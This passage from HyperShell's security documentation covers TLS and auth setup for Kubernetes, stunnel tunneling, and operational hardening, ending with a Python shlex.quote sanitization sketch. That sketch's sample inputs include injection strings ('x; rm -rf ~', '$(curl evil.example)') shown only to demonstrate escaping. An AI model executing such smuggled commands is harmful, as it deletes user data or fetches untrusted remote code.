Client Deployment.
Mount the same auth Secret and the CA from the cert-manager-issued Secret:
apiVersion: apps/v1
kind: Deployment
metadata:
name: hypershell-client
namespace: hypershell
spec:
replicas: 8
selector:
matchLabels: { app: hypershell-client }
template:
metadata:
labels: { app: hypershell-client }
spec:
containers:
- name: client
image: hypershell/hypershell:latest
args:
- "hs"
- "client"
- "--host"
- "hypershell-server.hypershell.svc.cluster.local"
env:
- name: HYPERSHELL_SERVER_TLS_ENABLED
value: "true"
- name: HYPERSHELL_SERVER_TLS_CAFILE
value: /tls/ca.crt
- name: HYPERSHELL_SERVER_TLS_SERVERNAME
value: hypershell-server.hypershell.svc.cluster.local
- name: HYPERSHELL_SERVER_AUTH
valueFrom:
secretKeyRef: { name: hypershell-auth, key: auth }
volumeMounts:
- { name: tls, mountPath: /tls, readOnly: true }
volumes:
- name: tls
secret: { secretName: hypershell-server-tls }
The client’s HYPERSHELL_SERVER_TLS_SERVERNAME matches the cert’s SAN, which makes the
TLS layer reject any pod that happens to attach to the same Service but presents a
different certificate.
Service mesh as an alternative
If your cluster already runs a service mesh (Istio, Linkerd) with mTLS for all
in-cluster traffic, you can rely on the mesh for transport security and disable
HyperShell’s own TLS layer (set HYPERSHELL_SERVER_TLS_ENABLED=false). The shared
authentication key still gates queue access. This is appropriate when the mesh-provided
identity model is authoritative and you want to avoid double encryption.
External Tunneling (Legacy)
For sites that pre-date built-in TLS or that already operate a sidecar tunneling layer for other reasons, HyperShell can run over an external tunnel with its own TLS disabled. This is documented for completeness; new deployments should prefer the built-in transport.
VPN. WireGuard, Tailscale, or OpenVPN provide a transparent encrypted tunnel between client and server hosts. HyperShell runs as if on a private network; no TLS configuration is required on the HyperShell side, though enabling it adds defense-in-depth at negligible cost.
stunnel. A stunnel sidecar can wrap a cleartext HyperShell connection in TLS:
# server-side stunnel.conf
[hypershell]
accept = 0.0.0.0:50001
connect = 127.0.0.1:50000
cert = /path/to/server-cert.pem
key = /path/to/server-key.pem
# client-side stunnel.conf
[hypershell]
client = yes
accept = 127.0.0.1:50000
connect = server.example.com:50001
CAfile = /path/to/ca-cert.pem
verify = 2
checkHost = server.example.com
With this layout the HyperShell server binds localhost:50000 and stunnel handles
TLS on port 50001. Disable HyperShell’s built-in TLS
(HYPERSHELL_SERVER_TLS_ENABLED=false) to avoid double-wrapping.
Operational Recommendations
Independent of the deployment style above:
Rotate keys and certificates regularly. A 90-day rotation cadence is a sensible default for both the auth key and the TLS certificate. cert-manager and Let’s Encrypt handle the certificate side automatically; the auth key requires an operator-driven rolling restart of server and clients.
Run as an unprivileged user. The HyperShell server itself does not require elevated privileges. Tasks run as the user that owns the client process; constrain that user accordingly.
Enable audit logging. Set logging.style = "detailed" (or "system") and ship logs to a central collector. The server logs every client connection, every task dispatched, and every completion. See logging for details. The per-invocation auth key is redacted from launch logs, but avoid shipping full configuration dumps (which contain a directly-set server.auth) to shared log infrastructure.
Sanitize task input. When generating tasks programmatically, treat the command string as a shell-injection vector: escape or template carefully, and never interpolate untrusted input into the command unescaped. hsx accepts arbitrary input from stdin by design; the trust boundary is whoever can write to that pipe.
Monitor connection patterns. HyperShell does not itself log failed authentication or failed TLS handshakes (they are handled by the underlying multiprocessing / TLS layer and not surfaced in the application log), so watch for probes and connection surges at the network layer (firewall counters, fail2ban, flow logs) rather than expecting them in HyperShell’s output.
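Quoting each untrusted value with shlex.quote before it enters a task line is one way to follow the sanitization advice above. The gzip template and build_tasks helper are hypothetical, and the sketch assumes clients execute tasks with a POSIX shell; the printed lines could then be piped into hsx.

```python
import shlex

# Hypothetical task template; '--' stops option parsing so names like '-rf' stay filenames.
TEMPLATE = "gzip --keep -- {path}"


def build_tasks(paths):
    """Render one shell-safe task line per untrusted path."""
    return [TEMPLATE.format(path=shlex.quote(p)) for p in paths]


untrusted = ["data/run 1.csv", "x; rm -rf ~", "$(curl evil.example)", "it's.csv"]
tasks = build_tasks(untrusted)
for line in tasks:
    print(line)
```

Each value reaches the shell as a single literal argument, so the ; and $( ) sequences are never interpreted as commands.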
Summary
HyperShell enables powerful parallel computing but requires careful attention to security because it executes arbitrary shell commands by design. The two essential controls HyperShell itself provides are the shared authentication key that gates the queue and the TLS layer that protects queue traffic on the wire. Both are enabled by default and self-provisioning on a single host; both are configurable end-to-end for multi-host deployments through TOML, environment variables, and CLI flags. Beyond the queue, the task database (especially PostgreSQL) and any SSH transports used for client distribution or output retrieval are adjacent trust surfaces that must be hardened independently.
Recommended practice:
Local single-host workflows: accept the defaults. Auto-generated self-signed certificates and per-invocation auth keys are sufficient.
Multi-host on trusted networks: accept the defaults if the site library directory is shared; otherwise pin the server fingerprint on each client.
Multi-host across untrusted networks: provision a real certificate (Let’s Encrypt or an internal CA), distribute a strong shared auth key out of band, restrict the server port at the firewall, run as an unprivileged user, and require sslmode=verify-full for any PostgreSQL connection.
Kubernetes: use cert-manager for certificates, Secret for the auth key, NetworkPolicy for connectivity, and consider an existing service mesh as an alternative transport-security layer.
Database and SSH: treat the PostgreSQL instance and your SSH key/host-key policy as part of the HyperShell threat surface. A leaked database password or a permissive authorized_keys defeats every protection in the queue.
For questions or to report security vulnerabilities, please contact the maintainers via the GitHub repository or join the Discord community.